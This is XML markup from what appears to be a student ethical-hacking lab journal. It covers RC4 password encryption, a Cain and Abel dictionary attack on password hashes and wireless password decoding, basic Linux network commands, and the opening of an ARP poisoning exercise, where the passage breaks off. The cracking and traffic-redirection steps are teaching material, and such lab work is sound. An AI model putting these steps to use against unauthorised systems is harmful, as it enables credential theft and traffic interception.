      </w:pPr>
      <w:r w:rsidRPr="00AC79F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Decrypt the encrypted passwords and verify the original values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00A913FB">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00A913FB">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00D748F9" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6067425" cy="33623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pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using RC4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75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Encryption using RC4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00D748F9" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F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067425" cy="3438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rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75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Decryption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00D748F9" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F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6067425" cy="33718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rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00A913FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00A913FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00A913FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00A913FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00A913FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00A913FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00A913FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00A913FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00A913FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRPr="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00AC79F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC79F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Password Cracking and Wireless Network Password Decoding: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRPr="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00AC79F2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AC79F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Use Cain and Abel to perform a dictionary attack on Windows account passwords. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRPr="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00AC79F2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AC79F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Decode wireless network passwords using Cain and Abel's capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRPr="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00CD2C75">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F"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1510" cy="3025430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rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75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Click  on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> HASH </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Calcuator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enter the password to convert into hash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876925" cy="3867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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>value  into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the field you have converted 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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MD5)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4943475" cy="1085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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Right Click on the hash and select the dictionary attack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Then  right</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> click on the file and select (Add to List) and then select the Wordlist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337300" cy="364680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</w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select all the options and start the dictionary attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00030BD3" w:rsidRPr="00D4195F" w:rsidRDefault="00030BD3" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00030BD3" w:rsidRPr="00D4195F" w:rsidRDefault="00030BD3" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00030BD3" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId28"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1300" w:left="1220" w:header="0" w:footer="88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 w:rsidRPr="00D4195F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4124325" cy="3771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rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00A913FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="2880" w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>PRACTICAL NO. 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="2925" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00A913FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>AIM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Linux Network Analysis and ARP Poisoning </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Linux Network Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Execute the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command to retrieve network interface information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the ping command to test network connectivity and analyze the output. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analyze the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command output to view active network connections. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perform a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>traceroute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to trace the route packets take to reach a target host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00A913FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRPr="00360D10" w:rsidRDefault="003D03C4" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360D10">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidR="00360D10" w:rsidRPr="00360D10">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00360D10" w:rsidRPr="00360D10">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00360D10" w:rsidRPr="00360D10">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to retrieve network interface information. </w:t>
      </w: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  <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61319555" wp14:editId="463AD6E3">
            <wp:extent cx="6057900" cy="380668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491" cy="38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</w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRPr="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360D10">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Use the ping command to test network connectivity and analyze the output. </w:t>
      </w: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  <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6DD6D0AB" wp14:editId="651034D1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>774700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>186055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5930265" cy="392557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</w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3: Analyze the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command output to view active network connections. </w:t>
      </w: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  <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F19E270" wp14:editId="4F10DFBE">
            <wp:extent cx="5943600" cy="3696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187" cy="37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</w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 4: Perform a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>traceroute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to trace the route packets take to reach a target host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> command and type </w:t>
      </w:r>
      <w:hyperlink r:id="rId33">
        <w:r w:rsidRPr="00D4195F">
          <w:rPr>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t xml:space="preserve">www.prestashop.com </w:t>
        </w:r>
        <w:r w:rsidRPr="00D4195F">
          <w:t>pr</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D4195F">
        <w:t>ess “Enter”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRPr="00D4195F" w:rsidRDefault="00360D10">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F"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56DFC38D" wp14:editId="615DCF10">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>934085</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>325065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5933440" cy="5307330"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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0B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRPr="00D4195F" w:rsidRDefault="00360D10">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD1B6A" w:rsidRPr="00D4195F" w:rsidRDefault="00DD1B6A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRPr="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ARP Poisoning: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRPr="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use ARP poisoning techniques to redirect network traffic on a Windows system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00360D10">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Analyze the effects of ARP poisoning on network communication and security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360D10" w:rsidRDefault="00360D10" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00CD2C75">
